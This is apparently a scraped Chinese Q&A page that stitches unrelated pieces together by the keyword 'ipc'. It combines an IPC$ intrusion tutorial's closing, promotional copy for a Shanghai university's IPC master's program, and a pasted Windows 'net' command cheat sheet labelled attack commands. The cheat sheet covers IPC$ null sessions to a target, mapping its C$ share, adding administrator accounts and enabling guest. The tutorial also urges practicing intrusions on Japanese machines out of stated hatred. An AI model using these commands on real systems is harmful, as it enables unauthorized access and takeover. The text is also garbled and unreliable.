关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.
最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)
『捌』 上海对外经贸大学ipc硕士1+1项目升学怎么样
上海对外经贸大学目前已经有24年的国际教育经验,逐步形成了以下优势:华东地区涉外商科大学:华东地区涉外商科大学,将商科专业与外语特色精巧结合的大学。教育部留基委合作共建:留基委合作共建,海外名校优先录取,教育部学历认证。上经贸大在编师资:上经贸大松江校区学习生活,与统招生享受同等师资,充分享受名校资源。校内学习,校内住宿:25人/班,小班制教学,充分照顾每个同学的学习情况。班主任跟班管理,定期家校沟通。海外服务团队解决国外难题:国外有成熟的留基委服务团队能够解决学生在国外遇到的生活与学习上的问题。归国就业优先落户:拥有海外留学背景以及高学历人才,在回国以后可以充分享受到国家对留学生的优惠政策,并且在求职者中脱颖而出。拥有国内外人脉资源:国内国外学习2年,积累到更多优秀的人脉资源,贴近高端商务人脉圈,更有利学生今后的职业生涯发展。1国内一年,国外一年,取得国外名校硕士学位
2免考研、免GRE/GMAT等应试考核
3多国知名院校、选择空间大:英美澳加新等英语授课国家都可选择
4多专业选择,可跨专业申请
专科生:商科类、经管类、社科类、传媒类等
本科生:除上述专业外均可以衔接本科原专业
5国内课程:雅思+基础硕士专业课
国外课程:核心硕士专业
6安全留学:国内1年准备,减小留学风险,组团去留学,储备国内人脉资源
『玖』 与目标IP建立IPC$空连接是否需要在局域网内 需要的是内网IP还是外网IP
看来你连原理都不清楚。 如果原理就不清楚可以使用自带传马的工具。 一句两句是说不清楚的 。 给你点DOS攻击命令 只自己看下。 以下复制+粘贴 net use \\ip\ipc$ " " /user:" " 建立IPC空链接 网管联盟bitsCN_com net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 网管联盟bitsCN@com net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H: 网管网www_bitscn_com net use h: \\ip\c$ 登陆后映射对方C:到本地为H: 网管朋友网www_bitscn_net net use \\ip\ipc$ /del 删除IPC链接 网管联盟bitsCN@com net use h: /del 删除映射对方到本地的为H:的映射 网管网www_bitscn_com net user 用户名 密码 /add 建立用户 中国网管论坛bbs.bitsCN.com net user guest /active:yes 激活guest用户 网管有家bitscn.net net user 查看有哪些用户 网管u家 net user 帐户名 查看帐户的属性 网管联盟bitsCN@com net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数 网管网 net start 查看开启了哪些服务 网管论坛bbs_bitsCN_com net start 服务名 开启服务;(如:net start telnet, net start schele) 网管联盟bitsCN@com net stop 服务名 停止某服务 网管u家 net time \\目标ip 查看对方时间 中国网管论坛bbs.bitsCN.com net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 网管u家bitscn.net net view 查看本地局域网内开启了哪些共享 网管联盟bitsCN@com net view \\ip 查看对方局域网内开启了哪些共享 网管u家bitscn.net net config 显示系统网络设置 网管下载dl.bitscn.com net logoff 断开连接的共享 网管bitscn_com net pause 服务名 暂停某服务 网管u家u.bitscn@com net send ip "文本信息" 向对方发信息 网管下载dl.bitscn.com net ver 局域网内正在使用的网络连接类型和信息 网管u家u.bitscn@com net share 查看本地开启的共享 网管论坛bbs_bitsCN_com net share ipc$ 开启ipc$共享 中国网管联盟bitsCN.com net share ipc$ /del 删除ipc$共享 网管朋友网www_bitscn_net net share c$ /del 删除C:共享 网管论坛bbs_bitsCN_com net user guest 12345 用guest用户登陆后用将密码改为12345 网管有家 net password 密码 更改系统登陆密码 网管u家u.bitsCN.com netstat -a 查看开启了哪些端口,常用netstat -an 网管u家 netstat -n 查看端口的网络连接情况,常用netstat -an 网管联盟bitsCN@com netstat -v 查看正在进行的工作 网管论坛bbs_bitsCN_com netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) 网管u家 netstat -s 查看正在使用的所有协议使用情况 网管u家u.bitscn@com nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近
『拾』 上海对外经贸大学IPC硕士项目对接的学校怎么样
学校介绍:
上海对外经贸大学,是为适应新中国对外贸易事业快速发展需要而建立的高等院校,是原对外经济贸易部(商务部前身)所属的4所高校之一。
世界贸易组织(WTO)首批12所教席院校之一(中国唯一)。
中国政府奖学金来华留学生接受院校。
国际商学院协会( AACSB)会员。
中国(上海)自由贸易区人才培养基地。
教育部考试中心:托福、雅思、GRE 等授权考点。
项目背景:
上海对外经贸大学与国家留学基金委员会下属东方国际教育交流中心合作共建的国外名校硕士培训课程。
为中国学生量身定制的赴美国、英国、澳大利亚、新西兰等国家就读硕士专业的培训课程,旨在帮助学生掌握专业基础知识,培养综合学习能力和素质,充分适应海外先进的教学模式,顺利完成赴海外学习过渡,降低学生在海外学习的紧迫感与留学成本。
项目特色:
国内一年,国外一年,取得国外名校硕士学位;
免考研、免GRE/GMAT等应试考核;
多国留学、选择空间大:英澳新等英语授课国家都可选择;
多专业选择,可跨专业申请:
专科生:商科类、经管类、社科类、传媒类等
本科生:除上述专业外均可以衔接本科原专业
国内课程:雅思+基础硕士专业课,国外课程:核心硕士专业课;
安全留学:国内1年准备,减小留学风险,组团去留学,储备国内人脉资源。
项目优势:
上海对外经贸大学目前已经有20多年的国际教育经验,逐步形成了以下优势:
特色鲜明:以培养高层次、应用型、国际化经贸人才为使命,力争发展成为规模适度,结构合理,人才培养、科学研究、社会服务和文化传承与创新协调发展的高水平、国际化、特色鲜明的应用研究型大学。
教育部留基委官方授权:留基委官方授权,海外名校优先录取,学历教育部认证。
高校师资:在大学城学习生活,与统招生享受同等师资,充分享受名校资源。
校内学习,校内住宿:小班制教学,班主任老师定期家校沟通,解决学生问题。
国内国外扩大人脉资源:国内国外学习2年,积累到更多优秀的人脉资源,贴近高端经济圈,很好的帮助学生以后的职业发展。
国内阶段:上海对外经贸大学硕士培训课程学习
学习期限:1年
学习内容:语言培训、专业基础课程、西方文化课以及升学指导课
毕业学习:学生顺利通过所有课程,且雅思达到相应要求后,将获得结业证书和成绩单
国外阶段:赴英、澳、新、美等国家攻读硕士学位阶段
学习期限:1-2年
学习内容:海外大学硕士阶段课程学习
毕业所得:学生顺利通过该学位要求的所有课程,并完成论文,将获得国外大学颁发的硕士学位证书
回国以后由教育部颁发国外学历学位认证书